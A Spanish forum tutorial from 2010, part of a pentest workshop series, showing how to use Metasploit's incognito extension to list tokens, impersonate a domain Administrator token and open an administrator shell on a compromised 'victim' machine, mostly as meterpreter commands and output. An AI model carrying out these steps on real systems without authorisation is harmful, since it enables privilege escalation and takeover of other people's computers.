Página 1 de 1

[Taller]Pentest S.O. parte IX

Publicado: 28 Jul 2010, 05:17
por shiva-sheva
+Temario
-+¿Que es incognito?
-+¿Para que funciona?
-+¿Para que nos sirve esto?
-+Lanzando incognito
-+Tomando la token del administrador
-+Lanzando cmd con los permisos de la token adquirida
-+Analizando 'execute -f cmd.exe -i -t'
-+Conclusion:
  • Bueno ahora vamos a jugar con alguna presa
    que tengamos online una vez que lograr tener una
    session en su ordenador podermos hacer muchas cosas
    como saben y ya vismos.
    Ahora les enseñare a usar incognito
+¿Que es incognito?
  • Incognito es un aaplicacion desarrollada por metasploit
    y que hace timepo la colocaron tambien en la shell
    meterpreter.
+¿Para que funciona?
  • Incgnito nos permite copiar los tokens de algun usuario.
    Explico mejor para que entiendan en un shell los tokens
    son lo mismo que las cookies en un navegador.¿Ya entendieron?
+¿Para que nos sirve esto?
  • Esto nos sirve para poder mover, borra, copiar, cargar cualquier cosa
    que queramos en fin para que no nos salga eso de que no tenemos
    permiso suficiente.
+Lanzando incognito
  • Bueno vamos ver como lanzarlo y sus opciones.

Código: Seleccionar todo

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help

Incognito Commands
==================

    Command              Description                                              
    -------              -----------                                              
    add_group_user       Attempt to add a user to a global group with all tokens  
    add_localgroup_user  Attempt to add a user to a local group with all tokens   
    add_user             Attempt to add a user with all tokens                    
    impersonate_token    Impersonate specified token                              
    list_tokens          List tokens available under current user context         
    snarf_hashes         Snarf challenge/response hashes for every token          

meterpreter >
+Viendo tokens disponibles
  • Veamos que tokens hay disponibles ...

Código: Seleccionar todo

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >
  • En este caso tenemos las tokens de administrador disponibles
    y bueno recordemos que despues de cojer un token
    hay que comprobar el USERID lo podemos lograr usando en comando
    getuid
+Tomando la token del administrador
  • Bueno ahora vamos a cojer la token de esta forma...

Código: Seleccionar todo

meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator
meterpreter >
  • Y despues de hacer esto nos van a dejar usar una shell
    con esta cuneta individual con este comando ('execute -f cmd.exe -i -t')
+Lanzando cmd con los permisos de la token adquirida
  • Bueno vamos a lanzarla...

Código: Seleccionar todo

meterpreter > execute -f cmd.exe -i -t
Process 3934 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3890]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
SNEAKS.IN\administrator

C:\WINDOWS\system32>
+Analizando 'execute -f cmd.exe -i -t
  • execute -f: Indicamos a meterpreter que lanze cmd
    -i: Nos deja tener contacto con la pc de la victima
    -t: Indicamos que use los privilegios que obtuvimos con incognito
+Conclusion:
  • Bueno ahora vimos mas metodos para tener el mayor control
    posible sobre un ordenador, se que en algunos casos les sera
    muy util a muchos y bueno esperen la parte X Saludos

Re: [Taller]Pentest S.O. parte IX

Publicado: 28 Jul 2010, 08:10
por wasamandrapa
Muchas gracias shiva-sheva..
tus aportaciones son muy buenas...
saludos